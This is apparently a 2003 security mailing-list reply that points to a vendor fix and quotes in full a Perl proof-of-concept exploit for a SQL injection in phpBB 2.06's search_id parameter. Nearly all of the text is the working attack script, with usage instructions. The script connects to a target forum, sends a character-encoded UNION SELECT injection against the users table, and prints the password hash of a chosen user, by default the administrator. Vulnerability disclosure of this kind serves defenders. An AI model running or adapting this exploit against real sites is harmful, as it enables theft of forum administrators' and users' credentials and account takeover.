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Re: phpBB v2.06 search_id sql injection exploit

It'd be nice if people would actually check the software site first for fixes ... http://www.phpbb.com/phpBB/viewtopic.php?t=153818 All you need to know is there.

International Veneer Co., Inc. wrote:

----- Original Message ----- From: "f3sy1 f3sy1" <f3sy1@mail.ru>
To: <bugtraq@securityfocus.com>
Sent: Saturday, December 20, 2003 6:00 PM
Subject: phpBB v2.06 search_id sql injection exploit

#!/usr/bin/perl -w use IO::Socket; ## PROOF-OF-CONCEPT ## * work only with mysql ver > 4.0 ## * work only with post #1 ## ## Example: ## C:\>r57phpbb-poc.pl phpBB2 2 2 ## [~] prepare to connect... ## [+] connected ## [~] prepare to send data... ## [+] OK ## [~] wait for response... ## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99 ## if (@ARGV < 4) { print "\n\n"; print "|****************************************************************|\n"; print " r57phpbb.pl\n"; print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n"; print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";; print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n"; print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n"; print " e.g.: r57phpbb-poc.pl phpBB2 2 2\n"; print " [~] <server> - server ip\n"; print " [~] <folder> - forum folder\n"; print " [~] <user_id> - user id (2 default for phpBB admin)\n"; print " [~] <search_id> - play with this value for results\n"; print "|****************************************************************|\n"; print "\n\n"; exit(1); } $success = 0; $server = $ARGV[0]; $folder = $ARGV[1]; $user_id = $ARGV[2]; $search_id = $ARGV[3]; print "[~] prepare to connect...\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "$socket error $!"; print "[+] connected\n"; print "[~] prepare to send data...\n"; # PROOF-OF-CONCEPT reguest... print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat(char(97,5 8,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108, 116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108 ,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50, 58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105 ,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,1 15,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116, 95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,11 5,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,1 12,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97, 114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_i d=$user_id/* HTTP/1.0\r\n\r\n"; print "[+] OK\n"; print "[~] wait for response...\n"; while ($answer = <$socket>) { if ($answer =~ /;highlight=/) { $success = 1; @result=split(/;/,$answer); @result2=split(/=/,$result[1]); $result2[1]=~s/&amp/ /g; print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n"; } } if ($success==0) {print "[-] exploit failed =(\n";} ## o---[ RusH security team | www.rsteam.ru | 2003 ]---o